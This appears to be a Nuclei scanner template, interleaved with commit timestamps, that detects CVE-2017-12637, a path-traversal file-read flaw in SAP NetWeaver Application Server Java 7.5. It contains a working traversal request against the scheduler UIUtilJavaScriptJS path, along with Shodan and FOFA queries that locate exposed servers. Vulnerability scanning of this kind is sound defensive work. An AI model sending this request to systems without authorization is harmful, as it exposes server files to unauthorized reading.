2021-01-02 05:02:50 +00:00
id : CVE-2017-12637
2020-11-17 10:14:41 +00:00
info :
2022-06-09 20:35:21 +00:00
name : SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
2020-11-17 10:14:41 +00:00
author : apt-mirror
severity : high
2022-06-09 20:35:21 +00:00
description : SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
2023-04-12 14:31:38 +00:00
- https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
2023-04-19 16:20:17 +00:00
- http://www.sh0w.top/index.php/archives/7/
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-12637
cwe-id : CWE-22
2024-06-07 10:04:29 +00:00
epss-score : 0.00715
epss-percentile : 0.80483
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*
2022-07-21 18:26:59 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : sap
product : netweaver_application_server_java
2023-09-06 13:22:34 +00:00
shodan-query : http.favicon.hash:-266008933
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash=-266008933
2024-01-14 09:21:50 +00:00
tags : cve2017,cve,sap,lfi,java,traversal
2020-11-17 10:14:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-11-17 10:14:41 +00:00
- method : GET
path :
- "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."
2023-07-11 19:49:27 +00:00
2020-11-17 10:14:41 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-11-17 10:14:41 +00:00
words :
- "WEB-INF"
- "META-INF"
2020-11-17 10:18:19 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100ed783ef94c829051131156882a1d41055caef81f37348b2ee7a988c2c726c40e022100ee5604c068addc2f9d74d2d87a2c8aebdfeded306b9c27dbd7f8e979ddebcf45:922c64590222798bb761d5b6d8e72950